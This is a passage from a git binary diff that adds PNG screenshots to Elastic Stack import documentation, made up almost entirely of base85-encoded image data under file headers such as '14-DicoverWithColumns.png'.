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
J^!&}o{{@ntATj^|

literal 0
HcmV?d00001

diff --git a/doc/ElasticStackImport/14-DicoverWithColumns.png b/doc/ElasticStackImport/14-DicoverWithColumns.png
new file mode 100644
index 0000000000000000000000000000000000000000..eba0dcfd4b694268b9d0185cd344acb52ad9bc1f
GIT binary patch
literal 516484
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
